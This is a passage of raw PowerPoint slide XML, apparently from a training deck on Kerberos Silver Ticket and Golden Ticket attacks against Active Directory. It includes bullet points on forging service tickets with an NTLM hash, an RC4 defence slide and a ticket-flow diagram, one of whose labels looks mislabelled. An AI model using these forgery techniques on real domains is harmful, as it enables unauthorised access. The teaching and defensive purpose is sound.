                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4076F0F7-94BA-47EC-9CE3-D8C215AF6C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858760" y="3184346"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1EC24B5-B2F9-4169-9C90-95B62B46F4CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388614" y="1018436"/>
            <a:ext cx="5119112" cy="255605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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forged TGS Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No interaction with the domain controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Need service key (NTLM hash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker granted access to the service with the privileges they state they have</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2621924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80ED-51C6-42AC-A243-65F7F8DE01AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Silver Ticket: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Defence</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FC4FE7-8FD4-4F3E-88B0-A4AB80E13F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable RC4 support / Monitor RC4</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1575816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272B-47EC-4CA6-9F5A-61A07468EE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 9: Golden Ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A7006A-5A3F-47DF-AF60-A1DDA370C68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75542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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Golden Ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="1038537"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{375D4B21-E3E0-4658-BDC2-A1FBA3F38932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="3227835"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841B6DC2-1588-4D79-8E5A-C7AA3647ADA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336294" y="4323724"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E935F3-B697-403A-BCC3-99D65F8EF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8859744" y="4713869"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775926" y="2963226"/>
            <a:ext cx="229724" cy="264609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B47BF69-9B1F-44D1-A5DC-74CFCDDD8520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3501511" y="1961012"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3320536" y="1627637"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C1E303F-1C33-44AF-B398-A1E42D76C4D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3320536" y="1627637"/>
              <a:ext cx="5271247" cy="1682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A76F2DF-CBB7-4F2C-8024-54C0BC93FD9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="3890252" y="1966409"/>
              <a:ext cx="4642500" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REQ (present TGT, request TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C248EB-F772-48F9-A5EF-1D535A53F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3652869" y="2373271"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3471894" y="2039896"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17EE7E12-93E7-42DF-A80D-E4F326DBA9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3471894" y="2039896"/>
              <a:ext cx="5190242" cy="1599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C32F8D4-3E06-46E3-A23A-59F7D85C6EAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4611779" y="2400062"/>
              <a:ext cx="3074839" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS_REP (TGS response)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E23493B-BEBF-4A24-BEF5-F87E5587F20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2398696" y="3758258"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="2398696" y="3758258"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F51800C-3F11-4E7A-AB9E-D1BE443E8827}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipV="1">
              <a:off x="2398696" y="3758258"/>
              <a:ext cx="5271247" cy="1682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FF7D9EA-F682-48C4-8EC6-D6C91D2C0991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="381265">
              <a:off x="3721427" y="4188518"/>
              <a:ext cx="2663618" cy="373170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (present TGS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F535996-1243-41AF-B40A-D53B0C1375C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2550054" y="4215121"/>
            <a:ext cx="5319830" cy="1599172"/>
            <a:chOff x="2550054" y="4215121"/>
            <a:chExt cx="5319830" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Arrow Connector 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498F2C12-70EF-41AB-A3CB-3D3DE828EAE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="1450539" flipH="1">
              <a:off x="2550054" y="4215121"/>
              <a:ext cx="5190242" cy="1599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40E178-A7CA-4DBA-88B6-CFB0378EE955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="435642">
              <a:off x="2691229" y="4648010"/>
              <a:ext cx="5178655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
